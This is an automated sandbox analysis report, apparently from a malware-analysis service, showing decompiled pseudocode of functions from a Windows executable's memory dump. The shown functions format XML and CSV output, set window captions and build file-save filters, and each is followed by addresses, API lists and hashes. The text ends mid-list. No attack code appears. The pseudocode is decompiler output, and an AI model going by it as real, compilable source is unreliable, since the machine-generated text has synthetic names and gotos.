				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E004086F5(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040DFD6();
				return E00408857(_t26, _t26, _a4,  &_v1028);
			}











                                                                                                                                                      0x00409460
                                                                                                                                                      0x00409479
                                                                                                                                                      0x0040947b
                                                                                                                                                      0x00409480
                                                                                                                                                      0x00409492
                                                                                                                                                      0x0040949e
                                                                                                                                                      0x004094a2
                                                                                                                                                      0x004094a8
                                                                                                                                                      0x004094af
                                                                                                                                                      0x004094b0
                                                                                                                                                      0x004094bb
                                                                                                                                                      0x004094c0
                                                                                                                                                      0x004094c1
                                                                                                                                                      0x004094dd

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040947B
                                                                                                                                                      • memset.MSVCRT ref: 00409492
                                                                                                                                                        • Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
                                                                                                                                                        • Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D
                                                                                                                                                      • _snwprintf.MSVCRT ref: 004094C1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                      • String ID: </%s>
                                                                                                                                                      • API String ID: 3400436232-259020660
                                                                                                                                                      • Opcode ID: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
                                                                                                                                                      • Instruction ID: 85b546f447cb05eec590fc4b387cecce4986b1e61cf39ba9e2c32341b3a77f5f
                                                                                                                                                      • Opcode Fuzzy Hash: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
                                                                                                                                                      • Instruction Fuzzy Hash: AE0186B3E0012966D720BB55CC45FEA767CEF45318F0004BABB09F71C2DB789E558A98
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406C43, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                      			E00406C43(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040E340(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x412ec8; // 0x0
				}
				_t25 =  *0x412c38;
				if( *0x412c38 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00406CC6(_t12);
					if(E00406D72(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00406BAC, 0);
				}
				return _t9;
			}









                                                                                                                                                      0x00406c43
                                                                                                                                                      0x00406c4b
                                                                                                                                                      0x00406c51
                                                                                                                                                      0x00406c55
                                                                                                                                                      0x00406c57
                                                                                                                                                      0x00406c57
                                                                                                                                                      0x00406c5d
                                                                                                                                                      0x00406c65
                                                                                                                                                      0x00406c67
                                                                                                                                                      0x00406c7d
                                                                                                                                                      0x00406c82
                                                                                                                                                      0x00406c85
                                                                                                                                                      0x00406c86
                                                                                                                                                      0x00406ca1
                                                                                                                                                      0x00406cad
                                                                                                                                                      0x00406cad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406cbd
                                                                                                                                                      0x00406cc5

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                      • String ID: caption
                                                                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                                                                      • Opcode ID: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
                                                                                                                                                      • Instruction ID: 29de1f336f9b1ad8a88558a0c2ea7e463315901b0f4d8a0f0fc28385d02cb639
                                                                                                                                                      • Opcode Fuzzy Hash: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
                                                                                                                                                      • Instruction Fuzzy Hash: 2DF0A472900314AAFB30AB55DD4AF8A3768DB04714F1100B6FA05B71D2D7B8ADA4CA9C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405954, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                      			E00405954(struct HWND__* _a4) {
				void _v514;
				short _v516;
				signed int _t11;

				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fe);
				GetClassNameW(_a4,  &_v516, 0xff);
				_t11 =  &_v516;
				_push(L"edit");
				_push(_t11);
				L0040E03E();
				asm("sbb eax, eax");
				return  ~_t11 + 1;
			}






                                                                                                                                                      0x0040595d
                                                                                                                                                      0x00405973
                                                                                                                                                      0x0040598a
                                                                                                                                                      0x00405990
                                                                                                                                                      0x00405996
                                                                                                                                                      0x0040599b
                                                                                                                                                      0x0040599c
                                                                                                                                                      0x004059a4
                                                                                                                                                      0x004059a9

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                                                                      • String ID: edit
                                                                                                                                                      • API String ID: 2747424523-2167791130
                                                                                                                                                      • Opcode ID: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
                                                                                                                                                      • Instruction ID: 748b3c7a54d916a83871e5d55f64a5683e5b8dafeb1aa9d8bd9837731e8c37d4
                                                                                                                                                      • Opcode Fuzzy Hash: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
                                                                                                                                                      • Instruction Fuzzy Hash: D7E0927298031E6AEB20EBB0DC4AFA577ACAB04708F4006B5B914F10C2EAB4964A4A44
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040DA9D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040DA9D() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x413268 == 0) {
					_t1 = LoadLibraryW(L"shell32.dll");
					 *0x413268 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x413264 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                                                      0x0040daa4
                                                                                                                                                      0x0040daab
                                                                                                                                                      0x0040dab3
                                                                                                                                                      0x0040dab8
                                                                                                                                                      0x0040dac0
                                                                                                                                                      0x0040dac6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040dac6
                                                                                                                                                      0x0040dab8
                                                                                                                                                      0x0040dacb

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                      • API String ID: 2574300362-880857682
                                                                                                                                                      • Opcode ID: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
                                                                                                                                                      • Instruction ID: 122d2585c685c0691ad6c3d54d7046cb00117d102b384f1c3bcadfb2245e5d9f
                                                                                                                                                      • Opcode Fuzzy Hash: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
                                                                                                                                                      • Instruction Fuzzy Hash: 5ED0C9F0A59300AAD720AF65AE097923AA4AB40713F149576E804F12B0D7B881C8CE6C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00408885, Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                      			E00408885(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				wchar_t* _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				wchar_t* _t63;
				wchar_t* _t64;
				void* _t68;
				void* _t69;
				intOrPtr* _t71;
				wchar_t* _t79;
				wchar_t* _t83;

				_t68 = __ebx;
				_t79 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t68 + 0x38)) + _v8 * 4);
						_t71 = _a8;
						if(_t71 != _t79) {
							_t83 =  *((intOrPtr*)( *_t71))(_t39,  *((intOrPtr*)(_t68 + 0x68)));
						} else {
							_t83 =  *( *((intOrPtr*)(_t68 + 0x2e4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t83, 0x2c);
						_pop(_t69);
						if(_t41 != 0) {
							L10:
							_v36 = _t79;
							_v32 = _t79;
							_v28 = _t79;
							_v20 = 0x100;
							_v24 = 1;
							_v16 = 0x22;
							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t83 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t81 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E004063DD(_t48, _t69, _t81, __eflags);
								_t83 =  &(_t83[0]);
								__eflags = _t83;
							}
							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
							_t53 = _v36;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40f454;
							}
							E00408857(_t68, _t69, _a4, _t53);
							E00406355( &_v36);
							_t79 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t83, 0x22);
							_pop(_t69);
							if(_t62 != 0) {
								goto L10;
							} else {
								_t63 = wcschr(_t83, 0xd);
								_pop(_t69);
								if(_t63 != 0) {
									goto L10;
								} else {
									_t64 = wcschr(_t83, 0xa);
									_pop(_t69);
									if(_t64 != 0) {
										goto L10;
									} else {
										E00408857(_t68, _t69, _a4, _t83);
									}
								}
							}
						}
						if(_v8 <  *((intOrPtr*)(_t68 + 0x34)) - 1) {
							E00408857(_t68, _t69, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t68 + 0x34)));
				}
				return E00408857(_t68, _t69, _a4, L"\r\n");
			}

























                                                                                                                                                      0x00408885
                                                                                                                                                      0x0040888c
                                                                                                                                                      0x00408891
                                                                                                                                                      0x00408894
                                                                                                                                                      0x0040889b
                                                                                                                                                      0x004088a1
                                                                                                                                                      0x004088a4
                                                                                                                                                      0x004088a9
                                                                                                                                                      0x004088c2
                                                                                                                                                      0x004088ab
                                                                                                                                                      0x004088b4
                                                                                                                                                      0x004088b4
                                                                                                                                                      0x004088c7
                                                                                                                                                      0x004088cf
                                                                                                                                                      0x004088d0
                                                                                                                                                      0x0040890c
                                                                                                                                                      0x0040890f
                                                                                                                                                      0x00408912
                                                                                                                                                      0x00408915
                                                                                                                                                      0x0040891f
                                                                                                                                                      0x00408926
                                                                                                                                                      0x0040892d
                                                                                                                                                      0x00408934
                                                                                                                                                      0x00408959
                                                                                                                                                      0x00408959
                                                                                                                                                      0x0040895c
                                                                                                                                                      0x0040895f
                                                                                                                                                      0x00408962
                                                                                                                                                      0x00408965
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040893b
                                                                                                                                                      0x0040893f
                                                                                                                                                      0x0040894e
                                                                                                                                                      0x00408951
                                                                                                                                                      0x00408951
                                                                                                                                                      0x00408941
                                                                                                                                                      0x00408941
                                                                                                                                                      0x00408946
                                                                                                                                                      0x00408946
                                                                                                                                                      0x00408952
                                                                                                                                                      0x00408958
                                                                                                                                                      0x00408958
                                                                                                                                                      0x00408958
                                                                                                                                                      0x0040896e
                                                                                                                                                      0x00408973
                                                                                                                                                      0x00408976
                                                                                                                                                      0x00408978
                                                                                                                                                      0x0040897a
                                                                                                                                                      0x0040897a
                                                                                                                                                      0x00408985
                                                                                                                                                      0x0040898d
                                                                                                                                                      0x00408992
                                                                                                                                                      0x00408992
                                                                                                                                                      0x004088d2
                                                                                                                                                      0x004088d5
                                                                                                                                                      0x004088dd
                                                                                                                                                      0x004088de
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004088e0
                                                                                                                                                      0x004088e3
                                                                                                                                                      0x004088eb
                                                                                                                                                      0x004088ec
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004088ee
                                                                                                                                                      0x004088f1
                                                                                                                                                      0x004088f9
                                                                                                                                                      0x004088fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004088fc
                                                                                                                                                      0x00408902
                                                                                                                                                      0x00408902
                                                                                                                                                      0x004088fa
                                                                                                                                                      0x004088ec
                                                                                                                                                      0x004088de
                                                                                                                                                      0x0040899b
                                                                                                                                                      0x004089a7
                                                                                                                                                      0x004089a7
                                                                                                                                                      0x004089ac
                                                                                                                                                      0x004089b2
                                                                                                                                                      0x004089bb
                                                                                                                                                      0x004089cd

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1983396471-0
                                                                                                                                                      • Opcode ID: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
                                                                                                                                                      • Instruction ID: 891d09ae9378dccf635ba886e12c54397b7589aa880eb7d9b0c0a307a2786e7e
                                                                                                                                                      • Opcode Fuzzy Hash: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
                                                                                                                                                      • Instruction Fuzzy Hash: 5B41B431900214ABDF10FEA5C941AAE7BB8EF04328F50853FF891F72C2DB7899458A59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040A084, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E0040A084(void* __eax, void* __eflags, wchar_t* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				signed int _t57;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				void* _t76;
				signed int _t80;
				wchar_t* _t91;
				void* _t92;
				void* _t94;
				void* _t95;

				_t76 = __eax;
				E00407A66(__eax, __eflags);
				_v12 = 0;
				_t57 = 0;
				while(1) {
					_t91 = _a4;
					if(( *(_t91 + _t57 * 2) & 0x0000ffff) + 0xffffffd0 > 9) {
						break;
					}
					_t57 = _t57 + 1;
					if(_t57 < 1) {
						continue;
					}
					_t71 = wcslen(_t91);
					if(_t71 >= 3) {
						break;
					}
					_push(_t91);
					L0040E062();
					if(_t71 >= 0 && _t71 <  *((intOrPtr*)(_t76 + 0x34))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t76 + 0x38)) + _t71 * 4) * 0x14 +  *((intOrPtr*)(_t76 + 0x2e4))));
					}
					L19:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t80 =  *0x4131d4; // 0x1
					_t58 = _v12;
					 *0x4131d4 =  *0x4131d4 + 1;
					 *((intOrPtr*)(0x4131d8 + _t80 * 4)) = _t58;
					return _t58;
				}
				__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
					L14:
					_t92 = 0;
					__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
					_v8 = 0;
					if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
						goto L19;
					} else {
						goto L15;
					}
					do {
						L15:
						_t60 = E0040546C( *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4)) + 0x10)), _a4);
						_t62 = E0040546C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x48)) + _t92 + 0x10)), _a4);
						_t95 = _t95 + 0x10;
						__eflags = _t60;
						if(_t60 >= 0) {
							L17:
							_v12 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4))));
							goto L18;
						}
						__eflags = _t62;
						if(_t62 < 0) {
							goto L18;
						}
						goto L17;
						L18:
						_v8 = _v8 + 1;
						_t92 = _t92 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
					} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
					goto L19;
				}
				_t94 = 0;
				__eflags = 0;
				do {
					_push(_a4);
					_t66 =  *((intOrPtr*)(_t76 + 0x2e4));
					_push( *((intOrPtr*)(_t94 + _t66 + 0x10)));
					L0040E03E();
					_push(_a4);
					_t67 =  *((intOrPtr*)(_t76 + 0x48));
					_push( *((intOrPtr*)(_t67 + _t94 + 0x10)));
					L0040E03E();
					_t95 = _t95 + 0x10;
					__eflags = _t66;
					if(_t66 == 0) {
						L11:
						_v12 =  *(_t94 +  *((intOrPtr*)(_t76 + 0x2e4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t67;
					if(_t67 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t94 = _t94 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
				} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L19;
				}
				goto L14;
			}




















                                                                                                                                                      0x0040a08d
                                                                                                                                                      0x0040a08f
                                                                                                                                                      0x0040a096
                                                                                                                                                      0x0040a099
                                                                                                                                                      0x0040a09b
                                                                                                                                                      0x0040a09b
                                                                                                                                                      0x0040a0a9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a0ab
                                                                                                                                                      0x0040a0af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a0b2
                                                                                                                                                      0x0040a0bb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a0bd
                                                                                                                                                      0x0040a0be
                                                                                                                                                      0x0040a0c6
                                                                                                                                                      0x0040a0e7
                                                                                                                                                      0x0040a0e7
                                                                                                                                                      0x0040a1af
                                                                                                                                                      0x0040a1b6
                                                                                                                                                      0x0040a1b8
                                                                                                                                                      0x0040a1b8
                                                                                                                                                      0x0040a1bf
                                                                                                                                                      0x0040a1c5
                                                                                                                                                      0x0040a1c8
                                                                                                                                                      0x0040a1ce
                                                                                                                                                      0x0040a1d6
                                                                                                                                                      0x0040a1d6
                                                                                                                                                      0x0040a0ef
                                                                                                                                                      0x0040a0f5
                                                                                                                                                      0x0040a0f8
                                                                                                                                                      0x0040a0fb
                                                                                                                                                      0x0040a157
                                                                                                                                                      0x0040a157
                                                                                                                                                      0x0040a159
                                                                                                                                                      0x0040a15f
                                                                                                                                                      0x0040a162
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a164
                                                                                                                                                      0x0040a164
                                                                                                                                                      0x0040a171
                                                                                                                                                      0x0040a182
                                                                                                                                                      0x0040a187
                                                                                                                                                      0x0040a18a
                                                                                                                                                      0x0040a18c
                                                                                                                                                      0x0040a192
                                                                                                                                                      0x0040a19b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a19b
                                                                                                                                                      0x0040a18e
                                                                                                                                                      0x0040a190
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a19e
                                                                                                                                                      0x0040a19e
                                                                                                                                                      0x0040a1a4
                                                                                                                                                      0x0040a1a7
                                                                                                                                                      0x0040a1a7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a164
                                                                                                                                                      0x0040a0fd
                                                                                                                                                      0x0040a0fd
                                                                                                                                                      0x0040a0ff
                                                                                                                                                      0x0040a0ff
                                                                                                                                                      0x0040a102
                                                                                                                                                      0x0040a108
                                                                                                                                                      0x0040a10c
                                                                                                                                                      0x0040a111
                                                                                                                                                      0x0040a116
                                                                                                                                                      0x0040a119
                                                                                                                                                      0x0040a11d
                                                                                                                                                      0x0040a122
                                                                                                                                                      0x0040a125
                                                                                                                                                      0x0040a127
                                                                                                                                                      0x0040a12d
                                                                                                                                                      0x0040a136
                                                                                                                                                      0x0040a139
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a139
                                                                                                                                                      0x0040a129
                                                                                                                                                      0x0040a12b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a140
                                                                                                                                                      0x0040a140
                                                                                                                                                      0x0040a146
                                                                                                                                                      0x0040a149
                                                                                                                                                      0x0040a149
                                                                                                                                                      0x0040a151
                                                                                                                                                      0x0040a155
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
                                                                                                                                                        • Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E
                                                                                                                                                      • wcslen.MSVCRT ref: 0040A0B2
                                                                                                                                                      • _wtoi.MSVCRT ref: 0040A0BE
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040A10C
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040A11D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1549203181-0
                                                                                                                                                      • Opcode ID: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
                                                                                                                                                      • Instruction ID: 173153ae92e8ec93863a9f5982dcfa1c11e383f1bf25a9e136d2eac58130d476
                                                                                                                                                      • Opcode Fuzzy Hash: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
                                                                                                                                                      • Instruction Fuzzy Hash: D2415C31900304AFCB21DF69C580A9EBBB4EF44355F1444BAEC05EB396D678DAA18B59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040AB6E, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040AB6E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				char* _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char* _v76;
				char _v80;
				void _v2126;
				signed short _v2128;
				void* __ebx;
				void* __edi;
				char _t32;
				intOrPtr _t33;
				char _t34;
				intOrPtr _t38;
				signed short _t57;
				char* _t62;
				char* _t64;

				_v2128 = _v2128 & 0x00000000;
				memset( &_v2126, 0, 0x7fe);
				_t32 =  *((intOrPtr*)(L"txt")); // 0x780074
				_v16 = _t32;
				_t33 =  *0x410294; // 0x74
				_v12 = _t33;
				_t34 = E00406827(0x1f5);
				_t64 = L"*.txt";
				_v80 = _t34;
				_v76 = _t64;
				_v72 = E00406827(0x1f6);
				_v68 = _t64;
				_v64 = E00406827(0x1f7);
				_v60 = L"*.json";
				_v56 = E00406827(0x1fb);
				_v52 = L"*.csv";
				_t38 = E00406827(0x1f8);
				_t62 = L"*.htm;*.html";
				_v48 = _t38;
				_v44 = _t62;
				_v40 = E00406827(0x1f9);
				_v36 = _t62;
				_v32 = E00406827(0x1fa);
				_v28 = L"*.xml";
				_v24 = E00406827(0x1fc);
				_v20 = _t64;
				E00406050( &_v2128,  &_v80);
				_t57 = 7;
				return E00405DCD(_a12,  *((intOrPtr*)(_a4 + 0x208)), _a8,  &_v2128, E00406827(_t57),  &_v16);
			}
































                                                                                                                                                      0x0040ab77
                                                                                                                                                      0x0040ab90
                                                                                                                                                      0x0040ab95
                                                                                                                                                      0x0040ab9a
                                                                                                                                                      0x0040ab9d
                                                                                                                                                      0x0040abaa
                                                                                                                                                      0x0040abad
                                                                                                                                                      0x0040abb2
                                                                                                                                                      0x0040abb8
                                                                                                                                                      0x0040abbb
                                                                                                                                                      0x0040abc8
                                                                                                                                                      0x0040abcb
                                                                                                                                                      0x0040abd6
                                                                                                                                                      0x0040abd9
                                                                                                                                                      0x0040abea
                                                                                                                                                      0x0040abed
                                                                                                                                                      0x0040abf4
                                                                                                                                                      0x0040abf9
                                                                                                                                                      0x0040abff
                                                                                                                                                      0x0040ac02
                                                                                                                                                      0x0040ac0f
                                                                                                                                                      0x0040ac12
                                                                                                                                                      0x0040ac1d
                                                                                                                                                      0x0040ac20
                                                                                                                                                      0x0040ac2c
                                                                                                                                                      0x0040ac39
